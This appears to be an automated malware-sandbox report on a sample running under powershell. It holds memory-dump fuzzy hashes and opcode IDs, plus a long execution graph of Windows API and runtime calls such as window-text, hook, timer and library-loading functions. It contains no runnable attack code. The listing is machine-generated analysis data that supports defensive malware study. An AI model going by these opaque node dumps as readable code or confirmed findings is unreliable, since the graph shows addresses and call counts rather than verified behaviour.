                                                                                                                                                      • Instruction Fuzzy Hash: ACB17774E012099FDB54DFA9D590A9DFBF2FF48304F20862AE819AB314DB34A955CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $]q$$]q$$]q$$]q
                                                                                                                                                      • API String ID: 0-858218434
                                                                                                                                                      • Opcode ID: ad65f70e9823f80269aad5367a9216ef918c4183d5c67ddd885562bc09fddc67
                                                                                                                                                      • Instruction ID: ae61e156dbcd3de9c25d720eb9e579bb0388b53be13302e5927a083d7412c154
                                                                                                                                                      • Opcode Fuzzy Hash: ad65f70e9823f80269aad5367a9216ef918c4183d5c67ddd885562bc09fddc67
                                                                                                                                                      • Instruction Fuzzy Hash: 192147F1B103165BDF395A6E8882B26A7EA9BC0715F64843AD555CB3C1DD31C871C372
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2121486484.0000000007A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A90000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_4_2_7a90000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                                      • API String ID: 0-978391646
                                                                                                                                                      • Opcode ID: 75f776cb0735de2755c4276c49863dc23086e140ad070ab1a9c4c7fbc035149e
                                                                                                                                                      • Instruction ID: 873c8e165d7c177bc8a7263ed0d0207e48a39a4346a73bba74f42b785a3bae2b
                                                                                                                                                      • Opcode Fuzzy Hash: 75f776cb0735de2755c4276c49863dc23086e140ad070ab1a9c4c7fbc035149e
                                                                                                                                                      • Instruction Fuzzy Hash: 560126B17093475FEB3A162C182012A6FF65FC3A507268567D490CB296CD158C5283A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:13.9%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:1.9%
                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                      Total number of Limit Nodes:77
                                                                                                                                                      execution_graph 19920 a93ca0 19924 a93cb9 19920->19924 19926 a93caf 19920->19926 19922 a93d77 19923 a8a970 107 API calls 19922->19923 19923->19926 19924->19922 19924->19926 19927 a94200 19924->19927 19932 a8a970 19924->19932 19928 a94220 19927->19928 19931 a9423f 19928->19931 19936 a94800 memcpy 19928->19936 19938 a8fcc0 19928->19938 19931->19924 19933 a8a976 19932->19933 19934 a8a9d5 19933->19934 19942 a7e380 19933->19942 19934->19924 19937 a94838 19936->19937 19937->19928 19940 a8fce2 19938->19940 19939 a8fd64 19939->19928 19940->19939 19941 a8fe94 memcpy 19940->19941 19941->19939 19945 a7e38d codecvt 19942->19945 19943 a7e4b8 19943->19933 19944 a7dfe0 103 API calls 19944->19945 19945->19943 19945->19944 19946 a7e2b0 2 API calls 19945->19946 19947 a7e310 105 API calls 19945->19947 19948 a87000 2 API calls 19945->19948 19946->19945 19947->19945 19948->19945 19949 a832ba 19951 a832d0 19949->19951 19950 a807a0 _CxxThrowException 19950->19951 19951->19950 19959 a82dc6 codecvt std::exception::exception 19951->19959 19952 a83e10 3 API calls 19952->19959 19953 a808c0 _CxxThrowException 19953->19959 19954 a817f0 _CxxThrowException 19954->19959 19955 a82deb 19956 a817f0 _CxxThrowException 19955->19956 19957 a833b2 codecvt 19956->19957 19962 a833cf 19957->19962 19992 a80ba0 _CxxThrowException 19957->19992 19959->19952 19959->19953 19959->19954 19959->19955 19963 a806c0 _CxxThrowException 19959->19963 19970 a82650 _CxxThrowException ??3@YAXPAX ??2@YAPAXI 19959->19970 19971 a82760 6 API calls 19959->19971 19975 a826e0 3 API calls 19959->19975 19981 a83d80 2 API calls 19959->19981 19983 a80730 _CxxThrowException _CxxThrowException 19959->19983 19984 a84b20 ??3@YAXPAX ??2@YAPAXI 19959->19984 19986 a83620 2 API calls 19959->19986 19989 a816a0 _CxxThrowException 19959->19989 19990 a841e0 ??3@YAXPAX ??2@YAPAXI 19959->19990 19991 a804f0 ??3@YAXPAX 19959->19991 19960 a8343a codecvt 19978 a83570 19960->19978 19980 a83f30 3 API calls 19960->19980 19961 a83575 19993 a804f0 ??3@YAXPAX 19961->19993 19962->19960 19962->19961 19963->19959 19965 a8357d 19994 a804f0 ??3@YAXPAX 19965->19994 19967 a83585 19995 a804f0 ??3@YAXPAX 19967->19995 19969 a8358d 19972 a83670 3 API calls 19969->19972 19970->19959 19971->19959 19973 a83595 19972->19973 19974 a7f630 codecvt ??3@YAXPAX 19973->19974 19976 a835a7 19974->19976 19975->19959 19996 a804f0 ??3@YAXPAX 19976->19996 19979 a835af 19982 a84390 2 API calls 19979->19982 19980->19978 19981->19959 19985 a835b7 19982->19985 19983->19959 19984->19959 19986->19959 19989->19959 19990->19959 19991->19959 19992->19962 19993->19965 19994->19967 19995->19969 19996->19979 19997 a7f8b0 19998 a7f8be 19997->19998 20000 a7f920 19998->20000 20002 a7f8ca 19998->20002 19999 a7f8d0 20012 a8a0a0 19999->20012 20004 a89f70 VariantClear 20000->20004 20002->19999 20008 a89f70 20002->20008 20004->19999 20005 a732f0 VariantClear 20007 a7f9ad 20005->20007 20009 a89f82 20008->20009 20010 a89f8a 20008->20010 20018 a8a0f0 20009->20018 20010->19999 20013 a8a0cd memcpy 20012->20013 20014 a8a0b3 20012->20014 20017 a7f99e 20013->20017 20015 a89fb0 VariantClear 20014->20015 20016 a8a0bc 20015->20016 20016->20013 20016->20017 20017->20005 20019 a8a107 20018->20019 20021 a8a103 20018->20021 20022 a8a070 20019->20022 20021->20010 20023 a8a081 20022->20023 20024 a8a085 20022->20024 20023->20021 20026 a89fb0 20024->20026 20027 a8a00c VariantClear 20026->20027 20028 a89fc3 20026->20028 20029 a89fd4 20027->20029 20028->20027 20028->20029 20029->20023 20083 a78a80 20084 a78b2c 20083->20084 20086 a78a93 codecvt 20083->20086 20085 a78b12 CallNextHookEx 20085->20084 20086->20085 20087 a78acc ScreenToClient 20086->20087 20093 a78b40 20087->20093 20089 a78ae2 PtInRect 20090 a78b05 20089->20090 20091 a78afa 20089->20091 20090->20085 20096 a78df0 20091->20096 20101 a7d910 20093->20101 20095 a78b53 GetClientRect 20095->20089 20097 a78e02 codecvt 20096->20097 20098 a78e00 20096->20098 20099 a78e0c KillTimer 20097->20099 20098->20090 20102 a78990 20099->20102 20101->20095 20103 a72c60 _DebugHeapAllocator 2 API calls 20102->20103 20104 a789b4 20103->20104 20105 a789fc codecvt 20104->20105 20106 a75e70 20 API calls 20104->20106 20113 a78a30 20105->20113 20107 a789c7 wsprintfW 20106->20107 20108 a89450 4 API calls 20107->20108 20108->20105 20111 a84cd0 codecvt ??3@YAXPAX 20112 a78a28 20111->20112 20112->20098 20118 a78a60 GetDlgItem 20113->20118 20115 a78a47 20119 a79790 SetWindowTextW 20115->20119 20118->20115 20122 a75cf0 20119->20122 20140 a75c20 20122->20140 20125 a76850 18 API calls 20126 a75d0f 20125->20126 20127 a89270 _DebugHeapAllocator 2 API calls 20126->20127 20128 a75d1f 20127->20128 20129 a89270 _DebugHeapAllocator 2 API calls 20128->20129 20130 a75d2c 20129->20130 20131 a89730 7 API calls 20130->20131 20132 a75d3c 20131->20132 20151 a804f0 ??3@YAXPAX 20132->20151 20134 a75d44 20152 a804f0 ??3@YAXPAX 20134->20152 20136 a75d4c codecvt 20137 a75d54 SetWindowTextW 20136->20137 20138 a84cd0 codecvt ??3@YAXPAX 20137->20138 20139 a75d6a 20138->20139 20139->20111 20141 a710d0 _Error_objects ??2@YAPAXI 20140->20141 20142 a75c2e GetWindowTextLengthW 20141->20142 20143 a75c41 20142->20143 20144 a75c6e 20142->20144 20145 a735b0 7 API calls 20143->20145 20146 a72c60 _DebugHeapAllocator 2 API calls 20144->20146 20147 a75c57 GetWindowTextW 20145->20147 20148 a75c7a 20146->20148 20147->20144 20149 a84cd0 codecvt ??3@YAXPAX 20148->20149 20150 a75c82 20149->20150 20150->20125 20151->20134 20152->20136 20166 a7c095 20167 a7c0ad 20166->20167 20168 a7c1dd codecvt 20167->20168 20169 a7c0bf 20167->20169 20249 a804f0 ??3@YAXPAX 20168->20249 20177 a7c0da codecvt 20169->20177 20247 a804f0 ??3@YAXPAX 20169->20247 20172 a7c14b 20248 a804f0 ??3@YAXPAX 20172->20248 20173 a7c25c 20250 a804f0 ??3@YAXPAX 20173->20250 20175 a7c156 20178 a7d200 ??3@YAXPAX 20175->20178 20179 a7c15e 20178->20179 20180 a7d2b0 3 API calls 20179->20180 20200 a7c166 20180->20200 20181 a7c267 _Error_objects 20182 a7c2a6 ??2@YAPAXI 20181->20182 20183 a7c2bf 20182->20183 20185 a7c2ca codecvt 20182->20185 20184 a7d350 InitializeCriticalSection 20183->20184 20184->20185 20186 a7c342 20185->20186 20187 a7c37f codecvt SafeRWList _Error_objects 20185->20187 20189 a734f0 codecvt 11 API calls 20186->20189 20188 a7c5ac 20187->20188 20195 a7c402 20187->20195 20196 a7c48a ??2@YAPAXI 20187->20196 20193 a7dc60 ??2@YAPAXI 20188->20193 20190 a7c359 20189->20190 20191 a7da30 codecvt 11 API calls 20190->20191 20192 a7c364 20191->20192 20194 a7d200 ??3@YAXPAX 20192->20194 20209 a7c5ce codecvt 20193->20209 20197 a7c36c 20194->20197 20246 a86de0 3 API calls 20195->20246 20210 a7c479 _Error_objects 20196->20210 20198 a7d2b0 3 API calls 20197->20198 20198->20200 20199 a7c422 20203 a7c431 20199->20203 20199->20210 20201 a7c74d 20252 a804f0 ??3@YAXPAX 20201->20252 20205 a734f0 codecvt 11 API calls 20203->20205 20204 a7c762 20207 a734f0 codecvt 11 API calls 20204->20207 20208 a7c448 20205->20208 20206 a7c61d SafeRWList 20211 a84ec0 _CxxThrowException 20206->20211 20223 a7c669 codecvt _Error_objects 20206->20223 20213 a7c76d 20207->20213 20214 a734f0 codecvt 11 API calls 20208->20214 20209->20201 20209->20206 20212 a7c4fb ??2@YAPAXI 20210->20212 20215 a7c649 20211->20215 20221 a7c514 20212->20221 20216 a7da30 codecvt 11 API calls 20213->20216 20217 a7c453 20214->20217 20218 a7c650 ??2@YAPAXI 20215->20218 20215->20223 20219 a7c778 20216->20219 20220 a7da30 codecvt 11 API calls 20217->20220 20218->20223 20224 a7d200 ??3@YAXPAX 20219->20224 20225 a7c45e 20220->20225 20222 a85e30 4 API calls 20221->20222 20234 a7c54f codecvt _Error_objects 20222->20234 20245 a85a00 122 API calls 20223->20245 20226 a7c780 20224->20226 20227 a7d200 ??3@YAXPAX 20225->20227 20228 a7d2b0 3 API calls 20226->20228 20229 a7c466 20227->20229 20228->20200 20230 a7d2b0 3 API calls 20229->20230 20230->20200 20231 a7c703 20232 a734f0 codecvt 11 API calls 20231->20232 20233 a7c714 20232->20233 20251 a804f0 ??3@YAXPAX 20233->20251 20238 a734f0 codecvt 11 API calls 20234->20238 20236 a7c71f 20237 a734f0 codecvt 11 API calls 20236->20237 20239 a7c72a 20237->20239 20238->20188 20240 a7da30 codecvt 11 API calls 20239->20240 20241 a7c735 20240->20241 20242 a7d200 ??3@YAXPAX 20241->20242 20243 a7c73d 20242->20243 20244 a7d2b0 3 API calls 20243->20244 20244->20200 20245->20231 20246->20199 20247->20172 20248->20175 20249->20173 20250->20181 20251->20236 20252->20204 21748 a7c39e 21750 a7c3ad codecvt SafeRWList 21748->21750 21749 a7c5ac 21751 a7dc60 ??2@YAPAXI 21749->21751 21750->21749 21752 a7c402 21750->21752 21753 a7c48a ??2@YAPAXI 21750->21753 21763 a7c5ce codecvt 21751->21763 21800 a86de0 3 API calls 21752->21800 21764 a7c479 _Error_objects 21753->21764 21754 a7c422 21757 a7c431 21754->21757 21754->21764 21755 a7c74d 21803 a804f0 ??3@YAXPAX 21755->21803 21759 a734f0 codecvt 11 API calls 21757->21759 21758 a7c762 21761 a734f0 codecvt 11 API calls 21758->21761 21762 a7c448 21759->21762 21760 a7c61d SafeRWList 21765 a84ec0 _CxxThrowException 21760->21765 21772 a7c669 codecvt _Error_objects 21760->21772 21767 a7c76d 21761->21767 21768 a734f0 codecvt 11 API calls 21762->21768 21763->21755 21763->21760 21766 a7c4fb ??2@YAPAXI 21764->21766 21769 a7c649 21765->21769 21776 a7c514 21766->21776 21770 a7da30 codecvt 11 API calls 21767->21770 21771 a7c453 21768->21771 21769->21772 21773 a7c650 ??2@YAPAXI 21769->21773 21774 a7c778 21770->21774 21775 a7da30 codecvt 11 API calls 21771->21775 21801 a85a00 122 API calls 21772->21801 21773->21772 21778 a7d200 ??3@YAXPAX 21774->21778 21779 a7c45e 21775->21779 21777 a85e30 4 API calls 21776->21777 21790 a7c54f codecvt _Error_objects 21777->21790 21780 a7c780 21778->21780 21781 a7d200 ??3@YAXPAX 21779->21781 21782 a7d2b0 3 API calls 21780->21782 21783 a7c466 21781->21783 21784 a7c46e 21782->21784 21785 a7d2b0 3 API calls 21783->21785 21785->21784 21786 a7c703 21787 a734f0 codecvt 11 API calls 21786->21787 21788 a7c714 21787->21788 21802 a804f0 ??3@YAXPAX 21788->21802 21793 a734f0 codecvt 11 API calls 21790->21793 21791 a7c71f 21792 a734f0 codecvt 11 API calls 21791->21792 21794 a7c72a 21792->21794 21793->21749 21795 a7da30 codecvt 11 API calls 21794->21795 21796 a7c735 21795->21796 21797 a7d200 ??3@YAXPAX 21796->21797 21798 a7c73d 21797->21798 21799 a7d2b0 3 API calls 21798->21799 21799->21784 21800->21754 21801->21786 21802->21791 21803->21758 20320 a818eb 20321 a818f4 codecvt 20320->20321 20322 a80b60 2 API calls 20321->20322 20326 a81d4c codecvt 20321->20326 20323 a81941 20322->20323 20324 a81955 20323->20324 20382 a80ba0 _CxxThrowException 20323->20382 20328 a80870 _CxxThrowException 20324->20328 20381 a81aba 20324->20381 20327 a83dd0 3 API calls 20326->20327 20329 a81de1 20327->20329 20331 a8197b 20328->20331 20391 a804f0 ??3@YAXPAX 20329->20391 20330 a81b7f 20335 a84b20 2 API calls 20330->20335 20332 a8198f 20331->20332 20383 a80ba0 _CxxThrowException 20331->20383 20343 a819a4 20332->20343 20384 a80ba0 _CxxThrowException 20332->20384 20338 a81b8c 20335->20338 20337 a81de9 20392 a804f0 ??3@YAXPAX 20337->20392 20341 a84b20 2 API calls 20338->20341 20377 a81b9c 20341->20377 20342 a81df1 20347 a815b0 _CxxThrowException 20342->20347 20345 a808c0 _CxxThrowException 20343->20345 20355 a819b6 codecvt 20343->20355 20344 a81b56 codecvt 20344->20326 20346 a808c0 _CxxThrowException 20344->20346 20345->20355 20346->20326 20349 a81e08 20347->20349 20348 a807c0 _CxxThrowException _CxxThrowException 20348->20377 20393 a84180 ??3@YAXPAX ??2@YAPAXI 20349->20393 20351 a81cc5 20351->20344 20390 a80ba0 _CxxThrowException 20351->20390 20352 a80b60 2 API calls 20364 a81c54 20352->20364 20354 a817f0 _CxxThrowException 20358 a81e17 codecvt 20354->20358 20359 a81a44 20355->20359 20360 a83e60 4 API calls 20355->20360 20356 a817f0 _CxxThrowException 20363 a81e66 20356->20363 20358->20354 20358->20363 20361 a81a7c 20359->20361 20366 a80b60 2 API calls 20359->20366 20360->20359 20365 a81a90 20361->20365 20387 a80ba0 _CxxThrowException 20361->20387 20362 a81e8b 20363->20356 20363->20362 20370 a81110 _CxxThrowException 20363->20370 20373 a81600 5 API calls 20363->20373 20364->20351 20364->20352 20389 a80ba0 _CxxThrowException 20364->20389 20371 a80b60 2 API calls 20365->20371 20365->20381 20368 a81a5c 20366->20368 20372 a81a6a 20368->20372 20385 a80ba0 _CxxThrowException 20368->20385 20369 a80ba0 _CxxThrowException 20369->20377 20370->20363 20379 a81aa5 20371->20379 20375 a80b60 2 API calls 20372->20375 20373->20363 20376 a81a72 20375->20376 20376->20361 20386 a80ba0 _CxxThrowException 20376->20386 20377->20348 20377->20364 20377->20369 20380 a808c0 _CxxThrowException 20379->20380 20379->20381 20380->20381 20381->20330 20381->20344 20388 a80ba0 _CxxThrowException 20381->20388 20382->20324 20383->20332 20384->20343 20385->20372 20386->20361 20387->20365 20388->20330 20389->20364 20390->20344 20391->20337 20392->20342 20393->20358 20394 a798e0 20403 a7d910 20394->20403 20396 a798f9 GetDC 20397 a799dd 20396->20397 20398 a7990d GetSystemMetrics GetSystemMetrics GetSystemMetrics SelectObject DrawTextW 20396->20398 20399 a7999f SelectObject 20398->20399 20404 a7d910 20399->20404 20402 a799d6 ReleaseDC 20402->20397 20403->20396 20404->20402 21955 a7f3f0 21956 a7f419 21955->21956 21957 a7f411 21955->21957 21956->21957 21959 a7f450 21956->21959 21964 a7f480 21959->21964 21962 a7f467 ??3@YAXPAX 21963 a7f473 21962->21963 21963->21957 21969 a7f4b0 21964->21969 21967 a734f0 codecvt 11 API calls 21968 a7f45f 21967->21968 21968->21962 21968->21963 21978 a804f0 ??3@YAXPAX 21969->21978 21971 a7f4c5 21979 a804f0 ??3@YAXPAX 21971->21979 21973 a7f4d3 21980 a7f570 21973->21980 21978->21971 21979->21973 22002 a804f0 ??3@YAXPAX 21980->22002 21982 a7f4e1 21983 a7f4f0 21982->21983 22003 a804f0 ??3@YAXPAX 21983->22003 21985 a7f505 22004 a804f0 ??3@YAXPAX 21985->22004 21987 a7f513 22005 a804f0 ??3@YAXPAX 21987->22005 21989 a7f521 21990 a7f630 codecvt ??3@YAXPAX 21989->21990 21991 a7f52f 21990->21991 21992 a7f630 codecvt ??3@YAXPAX 21991->21992 21993 a7f53d 21992->21993 21994 a7f630 codecvt ??3@YAXPAX 21993->21994 21995 a7f548 21994->21995 21996 a7f630 codecvt ??3@YAXPAX 21995->21996 21997 a7f553 21996->21997 22006 a804f0 ??3@YAXPAX 21997->22006 21999 a7f55e 22000 a7f590 codecvt ??3@YAXPAX 21999->22000 22001 a7f492 22000->22001 22001->21967 22002->21982 22003->21985 22004->21987 22005->21989 22006->21999 22027 a7bdf9 22043 a7be02 codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 22027->22043 22028 a7c267 _Error_objects 22029 a7c2a6 ??2@YAPAXI 22028->22029 22030 a7c2bf 22029->22030 22032 a7c2ca codecvt 22029->22032 22031 a7d350 InitializeCriticalSection 22030->22031 22031->22032 22033 a7c342 22032->22033 22038 a7c37f codecvt SafeRWList _Error_objects 22032->22038 22035 a734f0 codecvt 11 API calls 22033->22035 22034 a7c5ac 22042 a7dc60 ??2@YAPAXI 22034->22042 22036 a7c359 22035->22036 22039 a7da30 codecvt 11 API calls 22036->22039 22037 a7bf8b 22040 a734f0 codecvt 11 API calls 22037->22040 22038->22034 22046 a7c402 22038->22046 22047 a7c48a ??2@YAPAXI 22038->22047 22041 a7c364 22039->22041 22096 a7bf96 codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 22040->22096 22044 a7d200 ??3@YAXPAX 22041->22044 22067 a7c5ce codecvt 22042->22067 22043->22028 22043->22037 22045 a7bec0 22043->22045 22052 a7bef0 codecvt 22043->22052 22048 a7c36c 22044->22048 22049 a734f0 codecvt 11 API calls 22045->22049 22136 a86de0 3 API calls 22046->22136 22068 a7c479 _Error_objects 22047->22068 22050 a7d2b0 3 API calls 22048->22050 22051 a7bed5 22049->22051 22054 a7bee5 22050->22054 22055 a7d200 ??3@YAXPAX 22051->22055 22138 a94af0 2 API calls 22052->22138 22053 a7c422 22058 a7c431 22053->22058 22053->22068 22059 a7bedd 22055->22059 22056 a7c74d 22144 a804f0 ??3@YAXPAX 22056->22144 22061 a734f0 codecvt 11 API calls 22058->22061 22062 a7d2b0 3 API calls 22059->22062 22060 a7c762 22065 a734f0 codecvt 11 API calls 22060->22065 22066 a7c448 22061->22066 22062->22054 22063 a7c61d SafeRWList 22069 a84ec0 _CxxThrowException 22063->22069 22085 a7c669 codecvt _Error_objects 22063->22085 22064 a7bf28 22064->22037 22074 a7bf59 22064->22074 22071 a7c76d 22065->22071 22072 a734f0 codecvt 11 API calls 22066->22072 22067->22056 22067->22063 22070 a7c4fb ??2@YAPAXI 22068->22070 22073 a7c649 22069->22073 22083 a7c514 22070->22083 22076 a7da30 codecvt 11 API calls 22071->22076 22077 a7c453 22072->22077 22078 a7c650 ??2@YAPAXI 22073->22078 22073->22085 22079 a734f0 codecvt 11 API calls 22074->22079 22075 a7c04b 22080 a734f0 codecvt 11 API calls 22075->22080 22081 a7c778 22076->22081 22082 a7da30 codecvt 11 API calls 22077->22082 22078->22085 22086 a7bf70 22079->22086 22087 a7c056 22080->22087 22088 a7d200 ??3@YAXPAX 22081->22088 22089 a7c45e 22082->22089 22084 a85e30 4 API calls 22083->22084 22109 a7c54f codecvt _Error_objects 22084->22109 22137 a85a00 122 API calls 22085->22137 22090 a7d200 ??3@YAXPAX 22086->22090 22091 a7dc10 ??2@YAPAXI 22087->22091 22092 a7c780 22088->22092 22093 a7d200 ??3@YAXPAX 22089->22093 22094 a7bf78 22090->22094 22095 a7c077 22091->22095 22097 a7d2b0 3 API calls 22092->22097 22098 a7c466 22093->22098 22099 a7d2b0 3 API calls 22094->22099 22100 a7dc60 ??2@YAPAXI 22095->22100 22096->22075 22104 a7c019 22096->22104 22097->22054 22101 a7d2b0 3 API calls 22098->22101 22099->22054 22103 a7c089 22100->22103 22101->22054 22102 a7c703 22105 a734f0 codecvt 11 API calls 22102->22105 22118 a7c1dd codecvt 22103->22118 22120 a7c0bf 22103->22120 22106 a734f0 codecvt 11 API calls 22104->22106 22107 a7c714 22105->22107 22108 a7c030 22106->22108 22143 a804f0 ??3@YAXPAX 22107->22143 22111 a7d200 ??3@YAXPAX 22108->22111 22116 a734f0 codecvt 11 API calls 22109->22116 22113 a7c038 22111->22113 22112 a7c71f 22114 a734f0 codecvt 11 API calls 22112->22114 22115 a7d2b0 3 API calls 22113->22115 22117 a7c72a 22114->22117 22115->22054 22116->22034 22119 a7da30 codecvt 11 API calls 22117->22119 22141 a804f0 ??3@YAXPAX 22118->22141 22121 a7c735 22119->22121 22132 a7c0da codecvt 22120->22132 22139 a804f0 ??3@YAXPAX 22120->22139 22122 a7d200 ??3@YAXPAX 22121->22122 22124 a7c73d 22122->22124 22127 a7d2b0 3 API calls 22124->22127 22126 a7c14b 22140 a804f0 ??3@YAXPAX 22126->22140 22127->22054 22128 a7c25c 22142 a804f0 ??3@YAXPAX 22128->22142 22130 a7c156 22133 a7d200 ??3@YAXPAX 22130->22133 22134 a7c15e 22133->22134 22135 a7d2b0 3 API calls 22134->22135 22135->22054 22136->22053 22137->22102 22138->22064 22139->22126 22140->22130 22141->22128 22142->22028 22143->22112 22144->22060 16398 a979cf 16400 a979db _Error_objects 16398->16400 16399 a979f1 InterlockedCompareExchange 16399->16400 16401 a97a02 16399->16401 16400->16399 16400->16401 16402 a97a0a Sleep 16400->16402 16403 a97a23 _amsg_exit 16401->16403 16406 a97a2d __initterm_e 16401->16406 16402->16399 16403->16406 16404 a97a8c 16407 a97a99 16404->16407 16408 a97a91 InterlockedExchange 16404->16408 16405 a97a71 _initterm 16405->16404 16406->16404 16406->16405 16413 a97a51 _Error_objects 16406->16413 16415 a77530 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z GetLastError GetTickCount 16407->16415 16408->16407 16411 a97b18 16411->16413 16414 a97b20 _cexit 16411->16414 16412 a97ae1 exit _XcptFilter 16414->16413 16416 a7755e GetTickCount 16415->16416 16417 a77578 16415->16417 16416->16417 16418 a7756b GetTickCount 16416->16418 16751 a710d0 16417->16751 16418->16417 16421 a710d0 _Error_objects ??2@YAPAXI 16422 a775b8 16421->16422 16423 a710d0 _Error_objects ??2@YAPAXI 16422->16423 16424 a775c0 GetModuleHandleW GetProcAddress FreeConsole 16423->16424 16754 a76680 LoadLibraryA #17 16424->16754 16432 a7760d codecvt 16797 a76d00 16432->16797 16435 a77662 16802 a735b0 16435->16802 16436 a77630 17051 a77310 16436->17051 16441 a77683 17071 a7b300 16441->17071 16442 a776bc 16449 a76d00 3 API calls 16442->16449 16443 a84cd0 codecvt ??3@YAXPAX 16444 a77647 16443->16444 16446 a84cd0 codecvt ??3@YAXPAX 16444->16446 16448 a7764f 16446->16448 16451 a84cd0 codecvt ??3@YAXPAX 16448->16451 16452 a776d4 16449->16452 16450 a84cd0 codecvt ??3@YAXPAX 16453 a776a1 16450->16453 16703 a77657 16451->16703 16454 a776e0 16452->16454 16455 a7770d 16452->16455 16456 a84cd0 codecvt ??3@YAXPAX 16453->16456 16457 a84cd0 codecvt ??3@YAXPAX 16454->16457 16810 a72370 16455->16810 16459 a776a9 16456->16459 16460 a776f2 16457->16460 16462 a84cd0 codecvt ??3@YAXPAX 16459->16462 16464 a84cd0 codecvt ??3@YAXPAX 16460->16464 16462->16703 16463 a72370 _DebugHeapAllocator 3 API calls 16470 a7772b codecvt 16463->16470 16465 a776fa 16464->16465 16466 a84cd0 codecvt ??3@YAXPAX 16465->16466 16466->16703 16469 a71d50 _DebugHeapAllocator 3 API calls 16471 a77800 codecvt 16469->16471 16472 a71d50 _DebugHeapAllocator 3 API calls 16470->16472 16501 a777d2 codecvt 16470->16501 16843 a711c0 16471->16843 16473 a7776f codecvt 16472->16473 16478 a71d50 _DebugHeapAllocator 3 API calls 16473->16478 16476 a77860 16849 a73b10 16476->16849 16477 a7781c codecvt 16482 a7b300 51 API calls 16477->16482 16483 a7778b 16478->16483 16485 a77830 16482->16485 16486 a72370 _DebugHeapAllocator 3 API calls 16483->16486 16484 a77872 16856 a761f0 16484->16856 16487 a84cd0 codecvt ??3@YAXPAX 16485->16487 16488 a777bd 16486->16488 16489 a77845 16487->16489 16813 a75e70 16488->16813 16492 a84cd0 codecvt ??3@YAXPAX 16489->16492 16495 a7784d 16492->16495 16496 a84cd0 codecvt ??3@YAXPAX 16495->16496 16496->16703 16498 a77894 16502 a84cd0 codecvt ??3@YAXPAX 16498->16502 16499 a778c8 16500 a76d00 3 API calls 16499->16500 16503 a778d6 16500->16503 16840 a761c0 16501->16840 16504 a778a5 16502->16504 16513 a778e6 16503->16513 16516 a779b1 16503->16516 16505 a84cd0 codecvt ??3@YAXPAX 16504->16505 16506 a778ad 16505->16506 16507 a84cd0 codecvt ??3@YAXPAX 16506->16507 16510 a778b5 16507->16510 16508 a77a06 16877 a78540 16508->16877 16509 a779c0 wsprintfW 16511 a75e70 20 API calls 16509->16511 16515 a84cd0 codecvt ??3@YAXPAX 16510->16515 16511->16516 16514 a7797c 16513->16514 17082 a76ab0 16513->17082 16517 a84cd0 codecvt ??3@YAXPAX 16514->16517 16515->16703 16516->16508 16516->16509 16520 a736c0 13 API calls 16516->16520 16521 a7798e 16517->16521 16520->16516 16525 a84cd0 codecvt ??3@YAXPAX 16521->16525 16524 a7793b 16529 a7b300 51 API calls 16524->16529 16530 a77996 16525->16530 16527 a77a57 16889 a76dc0 16527->16889 16528 a77a22 16532 a84cd0 codecvt ??3@YAXPAX 16528->16532 16533 a77944 16529->16533 16531 a84cd0 codecvt ??3@YAXPAX 16530->16531 16535 a7799e 16531->16535 16536 a77a34 16532->16536 16537 a84cd0 codecvt ??3@YAXPAX 16533->16537 16539 a84cd0 codecvt ??3@YAXPAX 16535->16539 16540 a84cd0 codecvt ??3@YAXPAX 16536->16540 16541 a77959 16537->16541 16539->16703 16543 a77a3c 16540->16543 16544 a84cd0 codecvt ??3@YAXPAX 16541->16544 16545 a84cd0 codecvt ??3@YAXPAX 16543->16545 16546 a77961 16544->16546 16547 a77a44 16545->16547 16548 a84cd0 codecvt ??3@YAXPAX 16546->16548 16550 a84cd0 codecvt ??3@YAXPAX 16547->16550 16551 a77969 16548->16551 16550->16703 16553 a84cd0 codecvt ??3@YAXPAX 16551->16553 16552 a77ab7 16970 a76880 16552->16970 16553->16703 16556 a77aac 16558 a84cd0 codecvt ??3@YAXPAX 16556->16558 16557 a77b07 16559 a77b2f 16557->16559 16563 a77bb8 16557->16563 16558->16552 16560 a74c00 lstrcmpW 16559->16560 16561 a77b3b 16560->16561 16564 a77b4e 16561->16564 16567 a75e70 20 API calls 16561->16567 16562 a77bdb CoInitializeEx 16566 a74c00 lstrcmpW 16562->16566 16563->16562 17125 a78430 16564->17125 16570 a77bf1 16566->16570 16567->16564 16574 a77c0b 16570->16574 16576 a71d50 _DebugHeapAllocator 3 API calls 16570->16576 16571 a77a66 codecvt 16571->16552 16571->16556 16942 a74c00 16571->16942 16945 a716a0 16571->16945 16948 a736c0 16571->16948 16967 a84cd0 16571->16967 16977 a76800 16574->16977 16576->16574 16580 a84cd0 codecvt ??3@YAXPAX 16582 a77b95 16580->16582 16583 a84cd0 codecvt ??3@YAXPAX 16582->16583 16585 a77b9d 16583->16585 16586 a84cd0 codecvt ??3@YAXPAX 16585->16586 16587 a77ba5 16586->16587 16589 a84cd0 codecvt ??3@YAXPAX 16587->16589 16589->16703 16703->16411 16703->16412 17345 a89220 ??2@YAPAXI 16751->17345 16753 a710df 16753->16421 16755 a766a4 16754->16755 16756 a75e70 20 API calls 16755->16756 16757 a766ab 16756->16757 16758 a75e70 20 API calls 16757->16758 16759 a766ba 16758->16759 16760 a75e70 20 API calls 16759->16760 